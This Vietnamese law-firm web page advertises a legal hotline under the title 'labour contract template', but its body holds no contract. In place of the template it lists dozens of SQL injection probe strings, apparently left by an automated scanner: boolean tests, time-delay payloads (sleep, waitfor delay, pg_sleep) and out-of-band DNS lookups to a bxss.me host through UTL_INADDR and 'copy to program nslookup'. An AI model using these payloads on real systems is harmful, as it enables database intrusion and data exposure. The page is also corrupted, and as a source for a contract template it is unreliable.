Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Mẫu hợp đồng lao động

Cập nhật lần cuối lúc 10:05 ngày 17/12/2013

1
1
1
-1 OR 2+131-131-1=0+0+0+1 --
1'"
-1 OR 3+131-131-1=0+0+0+1 --
\
-1 OR 3*2<(0+5+131-131) --
1
-1 OR 3*2>(0+5+131-131) --
@@OKaCy
-1 OR 2+672-672-1=0+0+0+1
JyI=
-1 OR 3+672-672-1=0+0+0+1
-1 OR 3*2<(0+5+672-672)
-1 OR 3*2>(0+5+672-672)
-1' OR 2+660-660-1=0+0+0+1 --
-1' OR 3+660-660-1=0+0+0+1 --
-1' OR 3*2<(0+5+660-660) --
-1' OR 3*2>(0+5+660-660) --
-1' OR 2+306-306-1=0+0+0+1 or 'lece53Yd'='
-1' OR 3+306-306-1=0+0+0+1 or 'lece53Yd'='
-1' OR 3*2<(0+5+306-306) or 'lece53Yd'='
-1' OR 3*2>(0+5+306-306) or 'lece53Yd'='
-1" OR 2+13-13-1=0+0+0+1 --
-1" OR 3+13-13-1=0+0+0+1 --
-1" OR 3*2<(0+5+13-13) --
-1" OR 3*2>(0+5+13-13) --
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
-1; waitfor delay '0:0:6' --
-1); waitfor delay '0:0:6' --
1 waitfor delay '0:0:3' --
7QVfdr5a'; waitfor delay '0:0:3' --
-1;select pg_sleep(6); --
-1);select pg_sleep(6); --
-1));select pg_sleep(6); --
ohZfy8Bv';select pg_sleep(6); --
3mcJZKIs');select pg_sleep(9); --
xgTrgQfM'));select pg_sleep(9); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-4971.34060.c2994.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-4972.34060.c2994.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-4973.34060.c2994.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-4975.34060.c2994.\1.bxss.me
960'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: